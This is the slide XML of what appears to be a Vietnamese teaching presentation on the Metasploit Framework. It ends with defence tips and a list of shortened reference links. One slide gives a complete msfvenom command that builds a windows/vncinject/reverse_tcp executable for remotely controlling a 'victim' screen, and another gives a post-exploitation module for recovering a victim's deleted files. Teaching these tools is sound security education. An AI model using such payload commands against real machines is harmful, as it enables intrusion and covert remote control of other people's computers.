            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="754557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3970318"/>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smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Điều khiển màn hình máy victim từ xa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cách 2: Sử dụng </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>windows/vncinject/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" i="1" smtClean="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set ViewOnly False</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>msfvenom -p windows/vncinject/reverse_tcp lhost=[ip] lport=[cổng] viewonly=false -f exe -o [tên_file.exe]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3551813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838200" y="482600"/>
            <a:ext cx="10515600" cy="1181100"/>
          </a:xfrm>
          <a:prstGeom prst="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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NỘI</a:t>
            </a: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 DUNG</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2345636" y="1931643"/>
            <a:ext cx="7841974" cy="10103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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="280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Metasploit</a:t>
            </a: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Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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2345636" y="2974802"/>
            <a:ext cx="7841974" cy="10103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II. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="280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Metasploit</a:t>
            </a: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Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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2345636" y="4017961"/>
            <a:ext cx="7841974" cy="10103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III. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="280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Sử</a:t>
            </a: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280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dụng</a:t>
            </a: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280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Metasploit</a:t>
            </a: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Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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2345636" y="5061120"/>
            <a:ext cx="7841974" cy="10103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IV. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="280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Biện</a:t>
            </a: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280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pháp</a:t>
            </a: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280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phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"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2800" err="1" smtClean="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chống</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1459064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III. Sử dụng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1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Khôi phục file đã xóa của victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>use post/windows/gather/forensics/recovery_files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Screenshot_2017-11-02_04-06-53"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="-46038"/>
            <a:ext cx="12192000" cy="6904038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361637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IV. Biện pháp phòng chống</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3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thường xuyên cập nhập, nâng cấp các bản vá lỗi của hệ thống.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cài đặt, sử dụng các phần mềm diệt virus, thường xuyên nâng cấp và cập nhập các phiên bản mới nhất.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cẩn thận khi truy cập internet bằng mạng công cộng.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Không </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nên tải và sử dụng các tập tin không rõ nguồn gốc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sử dụng các phần mềm kiểm soát lưu lượng mạng.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1260931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Tài liệu tham khảo</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838200" y="1814286"/>
            <a:ext cx="5780314" cy="3894977"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://tinyurl.com/y73rrbtj</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">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US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://tinyurl.com/ycnzdmjg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">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US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://tinyurl.com/onh3zzn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">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US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://tinyurl.com/yahq3v9r</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">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US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://tinyurl.com/y9c3bmx2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">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US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://tinyurl.com/ybkyndwn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">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US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>tinyurl.com/y9uypydc</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5983514" y="1808163"/>
            <a:ext cx="5370286" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://tinyurl.com/gkpbunx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://tinyurl.com/yd7ze7p7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://tinyurl.com/oskyfjm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>https://tinyurl.com/yal2ssgz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>https://tinyurl.com/y9xkn3pb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://tinyurl.com/ybkyndwn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
